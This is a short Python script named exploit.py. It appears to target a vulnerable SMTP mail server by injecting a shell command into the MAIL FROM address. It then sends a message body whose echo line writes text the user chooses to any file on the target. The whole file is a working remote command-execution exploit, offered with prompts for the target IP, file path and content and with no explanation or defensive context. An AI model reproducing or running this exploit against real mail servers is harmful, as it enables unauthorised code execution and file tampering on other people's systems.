exploit.py

import socket, time
import sys

HOST = input("what is the ip address of the host?: ") 
PORT = 25              # The same port as used by the server
s = None

writeto = input("Which file do you want to write to?: ")#raw inputen
writewhat = input("What do you want to write to the file?: ")
payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n 
#c\r\n
#d\r\n
echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b"""
.
"""

for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
with s:
	data = s.recv(1024)
	print('Received', repr(data))
	time.sleep(1)
	print('sending')
	s.send(b"helo test.com\r\n")
	data = s.recv(1024)
	print('Received', repr(data))
	s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
	time.sleep(1)
	data = s.recv(1024)
	print('Received', repr(data))
	s.send(b"RCPT TO:<root>\r\n")
	data = s.recv(1024)
	print('Received', repr(data))
	s.send(b"DATA\r\n")
	data = s.recv(1024)
	print('Received', repr(data))
	s.send(payload)
	data = s.recv(1024)
	print('Received', repr(data))
	s.send(b"QUIT\r\n")
	data = s.recv(1024)
	print('Received', repr(data))
print("done")
s.close()